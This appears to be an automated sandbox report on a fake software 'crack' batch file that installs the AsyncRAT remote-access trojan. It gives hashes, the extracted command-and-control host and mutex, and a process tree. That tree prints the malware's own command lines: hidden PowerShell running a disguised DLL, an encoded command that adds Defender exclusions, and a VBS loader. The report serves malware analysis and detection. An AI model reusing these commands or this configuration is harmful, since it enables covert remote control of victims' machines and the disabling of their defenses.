Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
500s -
max time network
599s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
25/01/2025, 10:42
General
-
Target
lossless scaling/Registration ('Crack')/Crack.bat
-
Size
14KB
-
MD5
8bfba49d351559387e43cb66ffeaafc1
-
SHA1
2a237525a6d906e264b36bb11bdd2d6b997b0a64
-
SHA256
6be519bd1dcfbfcf4d192d1b8df90434f3fad30792cc817ace43bbec5314f232
-
SHA512
5ff2536f48dea56d6f1b736875ce88858bd6c4b4b68ae89ce9690b11f9983b4b41882757c6f8f4615e84c1bf782550c82fad1136779d076d198b7360dfdef41a
-
SSDEEP
384:re23N2+xMcYjLnGHXZYGJ+SbnnGxJ46QLGpbQusYrMTVOJwC9hc+tmsWSYd5Ajdn:re23N2+xMcYjTGHXZYGJ+SbnnGxJ46QC
Malware Config
Extracted
asyncrat
A 14
Default
3x3.casacam.net:303
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 6 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\\Data\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I /Y2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\3⤵
- Executes dropped EXE
-
-
C:\Users\Public\IObitUnlocker\BR\Font.exe"C:\Users\Public\IObitUnlocker\BR\Font.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
-
C:\Windows\system32\mode.commode con: cols=80 lines=102⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
838B
MD5b2a93166280809b9da482126a28346f6
SHA113705957ad74170698714cc84624196176610f14
SHA256d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d
SHA512924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb
-
Filesize
3KB
MD522e796539d05c5390c21787da1fb4c2b
SHA155320ebdedd3069b2aaf1a258462600d9ef53a58
SHA2567c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92
SHA512d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09
-
Filesize
1KB
MD5525f62941b065f72297568ad6edefdef
SHA191e926c5a83233362ed0bf20f3eeab16eacde3bd
SHA256a145dfb88362c371dbf3b79a6d2fb79096f850b64820524bece543f208068aad
SHA51282eb0c1d2384a952f3400544115b9e120f3727113dfdaf3f0cc3c932bc4fa8b7df9f02a5191955419dd29d6420ee10356e468c3b4b2a267198681d791b8c8e41
-
Filesize
15KB
MD5793c849c1b27be16abbb55235f84f5f3
SHA155d83f019df94912977b9222a0546d350c0f7ef6
SHA2563a2340721918ae899133a6ffee924013513944986e8d404ea90df48bd7d0252e
SHA512d0cc41017e57adfc7bb6c04951eee979d4a02f3ef99c35cac0b26963d91d5686e0e6c3d116fa1c56a8e6bc17cff37193e9b3731af2779ec916f0da07711a0067
-
Filesize
1KB
MD5b72ce05166195fb5b735f51362a8e032
SHA11ac77d57edfe9cb32d156e53da1e8109acfca013
SHA2565bfa189d95c903200d92d51d2bcb555a19612916a8437a948f7a6ae487bc0112
SHA512f9dfb1775981ece4ef2654834725eeb84a74f6c0e3a5ed2191a23b4b22b1a35a03ad2df3e09ebe4fdf455d54970f705474a8ee84c9be39f0e8c2c54aa66a112e
-
Filesize
156KB
MD56981d94fbcc31ca50551300f5b4a96a3
SHA1e38b3a74f2951f5480fb67acc75d41f3e2b4f70e
SHA2568c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811
SHA512b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD51d53f5a867dd69486834f81a7a490a2d
SHA14154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c
SHA256f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1
SHA512769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1
-
Filesize
434KB
MD568c9ee084cc409309b116ec6aea890a8
SHA1efd6aab18a08a63b146ad587d1fa08e0bb19bebc
SHA256ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d
SHA5129809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25
-
Filesize
181KB
MD5a435e2fb659a3596b017f556b53fa09d
SHA1c9ab6229bf239edac73593e0ffb53c1d9bb21686
SHA256e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512
SHA512aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495
-
Filesize
308B
MD52993b76e0b0ba015caf654881638a0c0
SHA17fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
SHA2560e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
SHA512a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
457KB
MD5dd3f962ccc2f5b5f34700307e35138f8
SHA190d80df0ef716260a7d4ed466cf40caf966f0969
SHA256e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb
SHA512619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae
-
Filesize
5KB
MD53fffc04611766c3d49b9f0b74752a2b5
SHA1c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5
SHA2567537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d
SHA5123ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
88KB
-
Filesize
48KB
-
Filesize
120KB
-
Filesize
56KB
-
Filesize
472KB
-
Filesize
408KB
-
Filesize
40KB
-
Filesize
32KB
-
Filesize
24KB
-
Filesize
304KB
-
Filesize
624KB
-
Filesize
4.8MB
-
Filesize
664KB
-
Filesize
40KB
-
Filesize
344KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
456KB
-
Filesize
624KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
344KB
-
Filesize
304KB
-
Filesize
336KB
-
Filesize
992KB
-
Filesize
648KB